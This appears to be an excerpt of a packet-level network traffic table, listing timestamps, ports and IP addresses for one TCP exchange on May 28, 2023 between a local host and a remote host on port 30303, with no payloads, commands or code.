May 28, 2023 10:46:23.397185087 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397192955 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397207022 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397228003 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397237062 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397237062 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397248983 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397259951 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397270918 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397289991 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397290945 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397304058 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397313118 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397316933 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397334099 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397342920 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397356033 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397365093 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397377014 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397398949 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397398949 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397412062 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397422075 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397430897 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397444010 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397461891 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397464991 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397485018 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397486925 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397495985 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397509098 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397514105 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397530079 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397536993 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397551060 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397557974 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397572994 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397572994 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397594929 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397594929 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397619009 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397620916 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397639990 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397641897 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397660017 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397660971 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397681952 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397682905 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397703886 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397707939 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397727013 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397727966 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397746086 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397747993 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397769928 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397773027 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397790909 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397792101 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397813082 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397813082 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397834063 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397835016 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397855997 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397856951 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397876978 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397878885 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397898912 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397903919 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397919893 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397922039 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397941113 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397943020 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397963047 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.397963047 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397984028 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.397985935 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.398006916 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.398010015 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.398021936 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.398045063 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.398053885 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.398066044 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.398086071 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.398106098 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.398106098 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.398106098 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.398128986 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.398135900 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.398149014 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.398243904 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.398457050 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.398509979 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.398813963 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.398860931 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.399739027 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.399799109 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.399807930 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.399837971 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.399863005 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.399882078 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.399919987 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.399940014 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.399960995 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.399967909 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.399981976 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.399988890 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400002956 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400007010 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400029898 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400034904 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400054932 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400055885 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400079966 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400093079 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400101900 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400121927 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400124073 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400145054 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400151014 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400166988 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400177956 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400197983 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400198936 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400217056 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400237083 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400245905 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400278091 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400317907 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400321007 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400326967 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400352955 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400369883 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400374889 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400393963 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400410891 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400429010 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400433064 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400445938 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400464058 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400480986 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400484085 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400504112 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400511980 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400540113 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400549889 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400549889 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400604963 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400605917 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400635958 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400654078 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400679111 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400686979 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400708914 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400733948 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400752068 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400769949 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400789976 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400810957 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400820017 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400831938 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400841951 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400854111 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400861025 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400881052 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400897026 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400908947 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400928020 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400949001 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.400958061 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.400971889 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401000023 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401019096 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401038885 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401060104 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401067019 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401082039 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401087046 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401102066 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401102066 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401124001 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401130915 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401148081 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401151896 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401169062 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401174068 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401195049 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401197910 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401216030 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401221991 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401237965 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401243925 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401261091 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401262999 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401278019 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401283026 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401303053 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401314974 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401323080 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401336908 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401344061 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401355028 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401365042 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401375055 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401386023 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401393890 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401407957 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401415110 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401433945 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401437998 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401463032 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401470900 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401483059 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401495934 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401518106 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401576042 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401618004 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401629925 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401885033 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401899099 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.401943922 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.401963949 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410197973 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410218954 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410238028 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410257101 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410276890 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410284996 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410298109 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410319090 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410320044 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410340071 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410348892 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410362005 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410365105 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410382032 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410392046 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410403967 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410418034 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410434961 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410438061 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410456896 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410464048 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410491943 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410506010 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410515070 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410527945 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410547972 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410551071 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410567999 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410568953 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410589933 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410590887 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410614014 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410620928 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410629988 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410643101 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410661936 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410662889 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410685062 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410686016 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410703897 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410722971 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410739899 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410761118 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410779953 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410783052 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410799026 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410801888 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410818100 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410837889 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410845041 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410868883 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410881042 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410888910 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410911083 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410929918 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.410953999 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410974026 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.410994053 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411012888 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411015987 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411035061 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411042929 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411056995 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411070108 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411077023 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411088943 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411097050 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411108017 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411118984 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411127090 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411139965 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411144972 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411160946 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411164045 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411180973 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411186934 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411201954 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411205053 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411221981 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411223888 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411242962 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411246061 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411266088 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411267042 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411288023 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411288977 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411309958 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411310911 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411330938 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411336899 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411350965 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411355019 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411372900 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411375999 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411393881 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411393881 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411415100 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411416054 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411436081 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411438942 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411457062 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411461115 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411484003 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411492109 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411504984 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411510944 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411526918 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411528111 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411546946 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411547899 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411566973 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411570072 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411587000 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411592007 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411609888 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411613941 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411634922 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.411634922 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.411655903 CEST	30303	49685	188.34.154.187	192.168.2.3
